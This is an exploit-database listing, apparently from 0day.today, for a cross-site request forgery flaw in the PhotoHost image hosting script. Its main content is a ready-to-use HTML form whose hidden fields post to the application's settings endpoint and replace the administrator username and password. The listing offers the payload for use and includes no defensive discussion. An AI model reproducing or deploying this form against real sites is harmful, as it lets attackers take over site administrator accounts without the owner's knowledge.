[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PhotoHost - Run Your Own Image Hosting Service CSRF

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17733
Category
web applications
Date add
15-03-2012
Platform
php
# Exploit Title: PhotoHost - Run Your Own Image Hosting Service CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/photohost-run-your-own-image-hosting-service/28803/
# Category::  webapps
# Demo : http://www.ktoolsdemos.net/photohost/mgr
# Greetz: Inj3ct0r Exploit DataBase 1337day.com





<form action="target.com/[PATH]/mgr.index.php?n=1&p_mode=website_settings" name="settings" method="post">
<input type="hidden" style="font-size: 10px; width: 300px;" value="newadminusername" name="mgr_username"/></td>
<input type="hidden" style="font-size: 10px; width: 300px;" value="new admin password" name="mgr_password"/>
<input type="image" src="http://www.draftduel.com/img/submit_button.gif"/>
</form>



#  0day.today [2024-12-25]  #